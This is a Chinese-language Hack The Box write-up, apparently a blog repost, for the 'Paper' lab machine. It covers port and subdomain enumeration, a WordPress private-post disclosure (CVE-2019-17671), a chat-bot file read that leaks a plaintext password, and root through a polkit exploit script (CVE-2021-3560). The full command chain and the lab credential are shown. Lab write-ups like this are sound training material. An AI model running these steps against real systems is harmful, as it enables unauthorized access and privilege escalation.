【Hack The Box】linux练习-- Paper

创始人

2024-02-27 18:20:37

0次

HTB 学习笔记

【Hack The Box】linux练习-- Paper

🔥系列专栏：Hack The Box
🎉欢迎关注🔎点赞👍收藏⭐️留言📝
📆首发时间：🌴2022年11月27日🌴
🍭作者水平很有限，如果发现错误，还望告知，感谢！

文章目录

HTB 学习笔记
- 信息收集
- 目录爆破
- 域名爆破
- office.paper
- wpscan
- chat.office.paper
- CVE-2019-17671
- CVE-2021-3650（唯一成功的）

在这里插入图片描述

信息收集

22/tcp  open  ssh      OpenSSH 8.0 (protocol 2.0)
| ssh-hostkey: 
|   2048 10:05:ea:50:56:a6:00:cb:1c:9c:93:df:5f:83:e0:64 (RSA)
|   256 58:8c:82:1c:c6:63:2a:83:87:5c:2f:2b:4f:4d:c3:79 (ECDSA)
|_  256 31:78:af:d1:3b:c4:2e:9d:60:4e:eb:5d:03:ec:a0:22 (ED25519)
80/tcp  open  http     Apache httpd 2.4.37 ((centos) OpenSSL/1.1.1k mod_fcgid/2.3.9)
|_http-generator: HTML Tidy for HTML5 for Linux version 5.7.28
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9
|_http-title: HTTP Server Test Page powered by CentOS
443/tcp open  ssl/http Apache httpd 2.4.37 ((centos) OpenSSL/1.1.1k mod_fcgid/2.3.9)
|_http-generator: HTML Tidy for HTML5 for Linux version 5.7.28
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9
|_http-title: HTTP Server Test Page powered by CentOS
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=Unspecified/countryName=US
| Subject Alternative Name: DNS:localhost.localdomain
| Not valid before: 2021-07-03T08:52:34
|_Not valid after:  2022-07-08T10:32:34
|_ssl-date: TLS randomness does not represent time
| tls-alpn: 
|_  http/1.1

commonName=localhost.localdomain
这个没用
在这里插入图片描述
443页面也一致

在这里插入图片描述页面响应是403，并且暴露了一个域名
office.paper
添加到hosts

目录爆破

我会跑 feroxbuster针对网站，它发现 /manual，但没有别的。 /manual是 Apache 默认页面：

在这里插入图片描述

域名爆破

wfuzz -u http://office.paper -H "Host: FUZZ.office.paper" -w

得到
chat.office.paper

office.paper

在这里插入图片描述
是一个新的页面
可以看到一些评论，

包括一些提示以及用户名

但是目前我不知道这有什么用，不过我们也从页面底部或者是数据包信息知道这是wp
所以我们将使用wpscan

wpscan

wpscan --url http://office.paper --api-token

token是从官网获得的
在这里插入图片描述
首先，没有插件

其次，漏洞太多了我不知道用哪个
先看看别的再说吧

chat.office.paper

在这里插入图片描述
登陆不了，页面下方显示注册被隐藏

那就回去wordpress看看能有啥
在这里插入图片描述说可以查看私人帖子，刚好我这有帖子
我要试一试
偶哟？我要试一试

CVE-2019-17671

在这里插入图片描述
按照指示操作
访问如下

http://office.paper/?static=1

在这里插入图片描述
确实得到了一个私密链接
通过这个链接我们可以注册本来注册不了的rockerchat

总结所有看得到的消息如下

recyclops help将显示命令
recyclops 可以获取文件和列出文件
这个频道是只读的
可以通过 DM（直接消息）联系 recyclops。

在这里插入图片描述存在lfi
有命令注入验证

文件读取正常

读取文件存在lfi

我会注意到 dwight 和 rocketchat 是盒子上唯一不在低于 1000 的系统/服务范围内的用户

这 .env文件很有趣，因为这些文件往往包含项目的秘密：
在这里插入图片描述得到一组凭据
我将ssh登陆

export ROCKETCHAT_USER=recyclops
export ROCKETCHAT_PASSWORD=Queenofblad3s!23

在这里插入图片描述
记得没事就更新一下linpeas.sh
我利用了linpeas.sh跑出了如下结果

我会跑 linpeas和 bash linpeas.sh. 在“系统信息”下输出的顶部，它表示系统容易受到 CVE-2021-3560 的攻击：

                                        ╔════════════════════╗
════════════════════════════════════════╣ System Information ╠════════════════════════════════════════╚════════════════════╝
╔══════════╣ Operative system
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#kernel-exploits
Linux version 4.18.0-348.7.1.el8_5.x86_64 (mockbuild@kbuilder.bsys.centos.org) (gcc version 8.5.0 20210514 (Red Hat 8.5.0-4) (GCC)) #1 SMP Wed Dec 22 13:25:12 UTC 2021
lsb_release Not Found╔══════════╣ Sudo version
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-version   
Sudo version 1.8.29╔══════════╣ CVEs Check
Vulnerable to CVE-2021-3560

这里还有一些枚举

╔══════════╣ Executing Linux Exploit Suggester
╚ https://github.com/mzet-/linux-exploit-suggester
[+] [CVE-2021-4034] PwnKitDetails: https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txtExposure: less probableTags: ubuntu=10|11|12|13|14|15|16|17|18|19|20|21,debian=7|8|9|10|11,fedora,manjaroDownload URL: https://codeload.github.com/berdav/CVE-2021-4034/zip/main[+] [CVE-2021-3156] sudo Baron SameditDetails: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txtExposure: less probableTags: mint=19,ubuntu=18|20, debian=10Download URL: https://codeload.github.com/blasty/CVE-2021-3156/zip/main[+] [CVE-2021-3156] sudo Baron Samedit 2Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt   Exposure: less probableTags: centos=6|7|8,ubuntu=14|16|17|18|19|20, debian=9|10Download URL: https://codeload.github.com/worawit/CVE-2021-3156/zip/main

CVE-2021-3650（唯一成功的）

https://github.com/secnigma/CVE-2021-3560-Polkit-Privilege-Esclation/blob/main/poc.sh

在这里获取脚本

传输到/tmp

chmod +x poc.sh
bash poc.sh
su - secnigma
secnigmaftw
sudo bash

在这里插入图片描述

上一篇： 小学五年级母爱的作文400字（经典5篇）

下一篇：网络结点中心性

【Hack The Box】linux练习-- Paper

HTB 学习笔记

文章目录

信息收集

目录爆破

域名爆破

office.paper

wpscan

chat.office.paper

CVE-2019-17671

CVE-2021-3650（唯一成功的）

相关内容

热门资讯